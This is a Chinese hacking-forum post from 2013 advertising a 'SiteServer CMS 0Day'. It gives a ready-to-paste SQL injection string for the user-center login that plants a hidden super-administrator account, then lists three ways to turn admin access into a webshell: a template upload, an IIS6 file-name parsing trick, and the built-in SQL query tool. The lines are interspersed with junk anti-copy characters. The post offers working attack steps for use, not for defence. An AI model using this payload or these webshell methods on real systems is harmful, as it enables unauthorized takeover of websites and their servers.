找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2028|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
) k& y+ v* @4 P: u* f9 N
' B7 ^) X/ B8 h4 L9 F$ nstieserver官网:www.siteserver.cn# ^  V) {2 ?- G: O

4 b! W9 S% P$ S; x" \ * \3 N# a1 c$ O
+ F& t7 j( a5 @( B% z* b' h
EXP:
7 }9 w0 {0 w/ X/ B+ C6 S4 C- G. z+ r
直接访问UserCenter/login.aspx
- V5 Q4 c8 M5 X$ l9 P+ d. \3 \
4 e% O+ a# G  \( E
9 }- r* \9 k5 c- x- [# b9 W4 O. A+ B0 A) D! Q
用户名处输入:8 v7 p* n* v# V! W  \

& o9 L4 v( J& H123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
0 n9 ?& V. A' ?  e" }# l4 Z- N, W: [* }
6 k" G! l9 Q; h2 S, F2 P0 i0 }  h + Z% b& j4 c: s% v) e

3 N* L: Z" Y6 |9 Y密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。& S7 D# N# Q4 X  B' D

) `: `6 V5 ~6 D8 v. n9 ]# ] 6 _# t6 C1 Z8 y9 q
5 W6 o( S* P+ C; W6 z0 X
之后再访问后台SiteServer/login.aspx用插入的用户登陆
& d- ~  v% K9 ~# U* X* P/ N" L
$ K) `- q& z- Q' \
1 ^. m7 y4 Z+ ~- [0 U) a' o3 o1 h7 \0 C8 N+ O" T# W. W; _8 Q( d
后台拿webshell的三种方法:
* ]8 J2 Q' n8 Z& q# ?" _
# }9 E- Z6 H  U: v一、1 V, }% C( u& G; e3 H3 b0 h( k
. E! M: S/ |5 n, @- A+ O$ t
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx5 T4 J6 z3 ], r! d3 K+ ?6 L( C

4 c" ^* f& N' [( {8 m* L二、
: N* U7 u* z) E  n4 E* o. c3 |4 F0 s! |4 m+ z
成员权限-》添加用户-》用户名为:1.asp" {3 V. U3 c8 e- P
1 s5 {2 ]* u5 |( t# T5 o
http://127.0.0.1/usercenter/
. l- }4 l" A4 ?+ p: X) F; W% T! q/ S, T) M0 ~0 U' u, y
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell' E( Y5 A1 w2 T* V& \# J9 M) V
# h$ D% F9 t1 T; G) I5 h# o" F
(ps:后台添加用户时不会验证是否含有非法字符)
0 }0 m& p2 z; {$ l7 i
# ], p/ O) R& V- s三、
* {. U* Q% }6 h5 K1 p; r3 s2 g; ?1 H: f& a4 t
系统工具-》实用工具-》机器参数查看9 T( D2 i9 k. x# j$ {
可以看到数据库类型、名称,WEB路径4 N0 d: k$ n" f* D2 u- j) n
' e& x' C2 N% i$ N9 M
系统工具-》数据库工具-》SQL语句查询
1 E9 M; `! ~6 d这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。# U. z9 p, Z/ N, G

1 w( F' \+ k7 {* {) ?. a) z" E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表